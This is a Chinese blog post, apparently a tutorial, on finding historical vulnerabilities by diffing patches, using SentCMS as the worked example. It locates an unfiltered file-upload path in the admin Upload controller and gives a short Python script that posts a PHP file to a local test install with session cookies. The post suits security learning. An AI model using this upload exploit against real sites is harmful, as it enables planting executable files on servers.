<!DOCTYPE html>
<html lang="zh-CN">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>
寻找历史漏洞
</title>

  <script type="text/javascript"
  src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>

<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [['$','$'], ['\\(','\\)']],
    displayMath: [['$$','$$'], ['\[','\]']],
    processEscapes: true,
    processEnvironments: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
    TeX: { equationNumbers: { autoNumber: "AMS" },
         extensions: ["AMSmath.js", "AMSsymbols.js"] }
  }
});
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Queue(function() {
    // Fix <code> tags after MathJax finishes running. This is a
    // hack to overcome a shortcoming of Markdown. Discussion at
    // https://github.com/mojombo/jekyll/issues/199
    var all = MathJax.Hub.getAllJax(), i
    for(i = 0; all.length > i; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
    }
});
</script>


  
  <meta name="author" content="bluebird" />
  <meta name="description" content="前言 对于著名cms 一旦爆出漏洞就算是xss 一天内都能看到漏洞分析文章和写好的利用代码。 但是如果我们渗透测试的时候遇到了不怎么著名的cms 发现" />





<meta name="generator" content="Hugo 0.53" />


<link rel="canonical" href="http://blue-bird1.github.io/post/findbug/" />
<link rel="alternative" href="/index.xml" title="青鸟的博客" type="application/atom+xml" />

<link href="/css/semantic.min.css" rel="stylesheet" />
<link rel="stylesheet" href="/css/site.css" />


</head>

<body>
  <div class="flip-container">
    <div class="flipper">
      <section class="front">
        
<nav class="ui top secondary menu">
  <div class="item">
    <i class="inverted big link bullseye icon dream-flip-toggle" title="Flip it!"></i>
  </div>
  <div class="item">
    <a href="/">
      <i class="inverted big link home icon" title="Home"></i>
    </a>
  </div>
</nav>
 
<div class="ui centered grid">
  <div class="fifteen wide mobile fifteen wide tablet eleven wide computer column post-list post-single-main">

    <section class="ui secondary top attached black segment">
      <a class="ui black right corner label" href="javascript:void(0)" onclick="savePostAsImg()">
        <i class="save icon"></i>
      </a>
      <header>
        <h1 class="ui header">
          寻找历史漏洞
          <div class="sub header">@ bluebird · May 22, 2018 · 3 min read · Update at May 22, 2018</div>
        </h1>
      </header>
      <article class="post-content" style="margin-top: 2rem; font-size: 1.4rem;">

<h2 id="前言">前言</h2>

<p>对于著名cms 一旦爆出漏洞就算是xss 一天内都能看到漏洞分析文章和写好的利用代码。
但是如果我们渗透测试的时候遇到了不怎么著名的cms  发现是历史版本 但是不能搜索到exp或者分析文章。我们就需要自己去进行补丁比较来发现漏洞</p>

<h3 id="如何开始">如何开始</h3>

<p>我们以<code>SentCMS</code>为例子 我们可以在码云下载到 <a href="https://gitee.com/sentcms/sentcms">下载地址</a>  或者使用
<code>git clone https://gitee.com/sentcms/sentcms</code>
码云作为中国的github 自然是很方便。
但是如果不是通过git进行管理 也建议把下载的旧版本和老版本使用git进行管理
因为git的版本管理和提交对比非常实用 也方便保存进度</p>

<p>大致的git操作是</p>

<pre><code>git init  #初始化git仓库
git add * #将旧版本全部文件添加
git commit  # 作为初始提交
# 将新版本覆盖到旧版本的操作 可能是 mv -r ../new/  . 或者其他操作
# git status 可能你会想要查看一下文件差异
git add * # 将全部文件改变添加
git commit # 提交更改
# git log 查看日志
# git diff  查看差异

</code></pre>

<h3 id="找到漏洞版本">找到漏洞版本</h3>

<p>一般来说你可以在版本更新日志里找到一些信息 很多cms都是有版本更新日志的 我们可以查看到修复了什么漏洞  但是这个cms没有发行版
 如果没有这种信息只能一个提交一个提交的去对比了
 可以使用web查看  <a href="https://gitee.com/sentcms/sentcms/commits/master">地址</a></p>

<p>你也可以使用</p>

<pre><code>git log
</code></pre>

<p>我们可以找到一条看起来可能是修复漏洞的提交
<img src="https://box.kancloud.cn/2001e78808bd4d60f0b7355e78b09fbe_628x162.png" alt="" /></p>

<h3 id="比较差异">比较差异</h3>

<p>可以在命令行使用<code>git diff</code> 来查看 也可以选择直接在web界面查看每个提交 <a href="https://gitee.com/sentcms/sentcms/commits/master">web提交地址</a></p>

<p>如果不是git 在linux可以使用<code>diff</code>命令</p>

<pre><code>diff -r dir1 dir2
</code></pre>

<p>也可以选择使用一些你喜欢的文件对比工具</p>

<h3 id="最重要的一步-查看代码">最重要的一步 查看代码</h3>

<p>提交行数不多 快速查看 发现疑似漏洞点
<img src="https://box.kancloud.cn/768d4ed85832725fdc7aea45e2699dfa_759x514.png" alt="" />
可以看到对文件校验是这个提交才添加的 我们查看旧版本并下载 <a href="https://gitee.com/sentcms/sentcms/blob/341877cfb8672eed52fdc332650ee8b7ee297946/application/common/controller/Upload.php">地址</a></p>

<p>这个时候阅读一下readme 可以看到</p>

<pre><code>│ ├─common             COMMON公共模型，不可访问
│ │ ├─controller      公共基类目录
│ │ ├─model           模型目录
│ │ ├─validate        验证配置
│ │ ├─view            公共模板目录
│ │ ├─widget          扩展组件目录
</code></pre>

<p>很明显我们不能直接访问 需要通过调用
这个时候Ide就能帮助我们快速找到调用</p>

<p>我们在ide搜索可以找到<code>application/admin/controller/Upload.php</code> 没有进行任何过滤的调用了</p>

<pre><code>namespace app\admin\controller;
use app\common\controller\Admin;

class Upload extends Admin {

	public function _empty() {
		$controller = controller('common/Upload');
		$action     = $this-&gt;request-&gt;action();
		return $controller-&gt;$action();
	}
}
</code></pre>

<p><a href="https://gitee.com/sentcms/sentcms/blob/341877cfb8672eed52fdc332650ee8b7ee297946/application/admin/controller/Upload.php">web地址</a></p>

<p>这个cms使用了tp5框架 需要通过路由访问
我们访问</p>

<pre><code>http://127.0.0.1/sentcms/admin/Upload/Upload
</code></pre>

<p>从报错信息可以看到已经执行到了漏洞语句位置
由代码可知 直接上传文件即可</p>

<h3 id="python编写exp">python编写exp</h3>

<pre><code>import requests
url = 'http://127.0.0.1/sentcms/admin/Upload/Upload'
files = {'phpinfo.php': open('phpinfo.txt','rb')}
# 我本地cookeie
cookie = {' remember_token':'1|8b6075452c23faa1eba56fe61b89df391811d155e7578a40114732131c49d01341d8a7e30460891e6525292631bfa038a97e3d1d9f1290b345c60a6ac0ea1484','PHPSESSID':'d4ubb72j0d9evlbktqqqct6ci2;'}

r = requests.post(url, files=file，cookies=cookie)
</code></pre>

<p>我们可以在<code>uploads\picture\20180521</code>找到一个，以微秒时间的md5编码为文件名的php文件</p>
</article>
    </section>

    <footer class="ui secondary attached segment dream-tags">
      
      
      <a class="ui label" href="/tags/web%E5%AE%89%E5%85%A8" title="web安全">web安全</a>
      
      
    </footer>

    

    

  </div>
  <div class="fifteen wide mobile fifteen wide tablet four wide computer column">

    <section class="ui top attached center aligned inverted segment">
  <div class="ui small circular image">
    
    <img src="http://www.gravatar.com/avatar/36cc0b77102e4b4e776f444f95525703?s=512">
    
  </div>
  <h3 class="ui header">bluebird&#39;s blog<div class="sub header" style="color: white;"></div>
  </h3>

  <div class="ui inverted horizontal list">
    
    <a class="item" href="/post">
      <i class="archive icon" title="Archives"></i>
    </a>
    
    <a class="item" href="/tags">
      <i class="tags icon" title="All Tags"></i>
    </a>
    <a class="item" href="/categories">
      <i class="inverted cubes icon" title="All Categories"></i>
    </a>
  </div>

  <a id="tag-category-pop" class="ui red right corner label">
    <i class="pointing down icon" title="Click this to pop tags and categories"></i>
  </a>
</section>


<section class="ui attached center aligned inverted segment dream-header-tags dream-tags">
  
  <a class="ui label" href="/tags/docker" title="docker">docker</a>
  
  <a class="ui label" href="/tags/web%E5%AE%89%E5%85%A8" title="web安全">web安全</a>
  
  <a class="ui label" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0" title="学习笔记">学习笔记</a>
  
  <a class="ui label" href="/tags/%E5%AE%A1%E8%AE%A1" title="审计">审计</a>
  
  <a class="ui label" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90" title="漏洞分析">漏洞分析</a>
  
  <a class="ui label" href="/tags/%E7%BC%96%E7%A8%8B%E6%8A%80%E6%9C%AF" title="编程技术">编程技术</a>
  
  <a class="ui label" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8" title="网络安全">网络安全</a>
  
</section>



<section class="ui attached inverted segment dream-categories">
  <div class="ui inverted accordion">
    
    <div class="title">
      <i class="dropdown icon"></i>
      <a href="/categories/%E7%BB%9F%E8%AE%A1%E5%AD%A6" class="item" style="color: white;">统计学</a>
    </div>
    <div class="content">
      <div class="ui link inverted list">
      
      <div class="item" style="padding-left: 24px;">
        <i class="cocktail icon"></i>
        <div class="content">
          <a href="http://blue-bird1.github.io/post/statistics2/" class="item">Statistics2</a>
        </div>
      </div>
      
      </div>
    </div>
    
    <div class="title">
      <i class="dropdown icon"></i>
      <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8" class="item" style="color: white;">网络安全</a>
    </div>
    <div class="content">
      <div class="ui link inverted list">
      
      <div class="item" style="padding-left: 24px;">
        <i class="cocktail icon"></i>
        <div class="content">
          <a href="http://blue-bird1.github.io/post/thinkphp5-1/" class="item">think5审计与调试技巧1</a>
        </div>
      </div>
      
      <div class="item" style="padding-left: 24px;">
        <i class="cocktail icon"></i>
        <div class="content">
          <a href="http://blue-bird1.github.io/post/findbug/" class="item">寻找历史漏洞</a>
        </div>
      </div>
      
      </div>
    </div>
    
  </div>
</section>


<section class="ui bottom attached center aligned inverted segment">
    
    <p>© 2016 - 2019 青鸟的博客</p>
    
    <p>Powered by <a href="https://gohugo.io/" target="_blank">Hugo</a> with theme <a href="https://github.com/g1eny0ung/hugo-theme-dream" target="_blank">Dream</a>.</p>
</section>


  </div>
</div>

      </section>
      <section class="back">
        <nav class="ui top secondary menu" style="overflow-x: auto">
  <div class="item">
    <i class="inverted big link bullseye icon dream-flip-toggle" title="Flip it!"></i>
  </div>
  
  
  <div class="item">
    <a href="https://github.com/blue-bird1" target="_blank">
      <i class="inverted big github icon" title="github"></i>
    </a>
  </div>
  
  
  
  
</nav>

<div class="ui centered grid about">
  <div class="fifteen wide mobile fifteen wide tablet fifteen wide computer column">

    <section class="ui stacked segments">
      <header class="ui inverted segment">
        <h2 class="ui header">
          About
        </h2>
      </header>

      <article class="ui inverted segment back-about">
        <div class="ui stackable three column grid">
          <div class="column">
              
              <p>青鸟 一名无业游民</p>

<p>主要技能是编程 擅长CV大法
主要使用的编程语言</p>

<ul>
<li>python</li>
<li>golang</li>
</ul>

<p>主要使用的工具</p>

<ul>
<li>docker</li>
<li>vim</li>
<li>msf</li>
</ul>

<p>写about me时的没有材料 是下次努力的动力</p>

              
          </div>
          <div class="column">
              
          </div>
          <div class="column">
              
          </div>
        </div>
      </article>

      

      
      
    </section>

  </div>
</div>

      </section>
    </div>
  </div>

  
<script src="/js/jquery.min.js"></script>
<script src="/js/semantic.min.js"></script>
<script src="/js/html2canvas.min.js"></script>
<script src="/js/bg.js"></script>
<script src="/js/site.js"></script>



<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-110301700-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>



</body>

</html>
